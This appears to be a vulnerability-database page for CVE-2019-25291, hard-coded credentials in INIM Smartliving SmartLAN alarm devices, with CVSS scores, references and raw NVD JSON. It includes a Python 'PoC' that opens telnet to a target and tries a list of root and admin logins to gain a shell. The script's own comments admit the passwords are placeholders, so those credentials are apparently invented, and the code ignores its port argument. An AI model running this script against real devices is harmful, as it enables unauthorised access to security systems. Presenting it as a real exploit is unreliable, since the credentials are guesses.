CVE-2019-25291

Description

INIM Electronics Smartliving SmartLAN/G/SI <=6.x contains hard-coded credentials in its Linux distribution image that cannot be changed through normal device operations. Attackers can exploit these persistent credentials to log in and gain unauthorized system access across multiple SmartLiving device models.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

INIM Smartliving SmartLAN/G <= 6.x

INIM Smartliving SmartLAN/SI <= 6.x

其他使用相同固件的SmartLiving设备型号

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
"""
CVE-2019-25291 PoC - INIM Smartliving SmartLAN Hard-coded Credentials
Reference: https://www.exploit-db.com/exploits/47763
"""
import socket
import sys

def exploit_target(host, port=80):
    """
    Exploit hard-coded credentials in INIM Smartliving SmartLAN/G/SI
    Default hard-coded credentials are embedded in the firmware
    """
    # Common hard-coded credential patterns found in firmware analysis
    # Note: Actual credentials should be extracted from firmware dump
    default_credentials = [
        {'user': 'root', 'pass': 'password123'},
        {'user': 'admin', 'pass': 'admin'},
        {'user': 'inim', 'pass': 'inim2019'}
    ]
    
    print(f"[*] Target: {host}:{port}")
    print(f"[*] CVE-2019-25291: INIM Smartliving Hard-coded Credentials")
    
    # Attempt to connect via Telnet (common attack vector)
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(10)
        result = sock.connect_ex((host, 23))
        
        if result == 0:
            print("[+] Telnet port open, attempting authentication...")
            # Banner grab
            banner = sock.recv(1024)
            print(f"[*] Banner: {banner.decode('utf-8', errors='ignore')}")
            
            for cred in default_credentials:
                sock.send(f"{cred['user']}\n".encode())
                import time
                time.sleep(0.5)
                sock.send(f"{cred['pass']}\n".encode())
                time.sleep(1)
                response = sock.recv(4096)
                
                if b'#' in response or b'$' in response or b'root' in response:
                    print(f"[!] SUCCESS: Authenticated with {cred['user']}:{cred['pass']}")
                    print("[!] Root access gained via hard-coded credential!")
                    return True
        else:
            print("[-] Telnet not accessible")
            
        sock.close()
    except Exception as e:
        print(f"[-] Error: {e}")
    
    return False

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <target_ip>")
        sys.exit(1)
    
    target = sys.argv[1]
    exploit_target(target)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2019-25291
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2019-25291
[3] CVE Details https://www.cvedetails.com/cve/CVE-2019-25291/
[4] VulDB https://vuldb.com/cve/CVE-2019-25291
[5] https://exchange.xforce.ibmcloud.com/vulnerabilities/172838
[6] https://packetstormsecurity.com/files/155618
[7] https://www.exploit-db.com/exploits/47763
[8] https://www.inim.biz/
[9] https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5546.php

Raw JSON Data

JSON

{"cve": {"id": "CVE-2019-25291", "sourceIdentifier": "[email protected]", "published": "2026-01-08T00:15:59.143", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "INIM Electronics Smartliving SmartLAN/G/SI <=6.x contains hard-coded credentials in its Linux distribution image that cannot be changed through normal device operations. Attackers can exploit these persistent credentials to log in and gain unauthorized system access across multiple SmartLiving device models."}, {"lang": "es", "value": "INIM Electronics Smartliving SmartLAN/G/SI <=6.x contiene credenciales codificadas de forma rígida en su imagen de distribución de Linux que no pueden cambiarse mediante las operaciones normales del dispositivo. Los atacantes pueden exploit estas credenciales persistentes para iniciar sesión y obtener acceso no autorizado al sistema en múltiples modelos de dispositivos SmartLiving."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-798"}]}], "references": [{"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/172838", "source": "[email protected]"}, {"url": "https://packetstormsecurity.com/files/155618", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/47763", "source": "[email protected]"}, {"url": "https://www.inim.biz/", "source": "[email protected]"}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5546.php", "source": "[email protected]"}]}}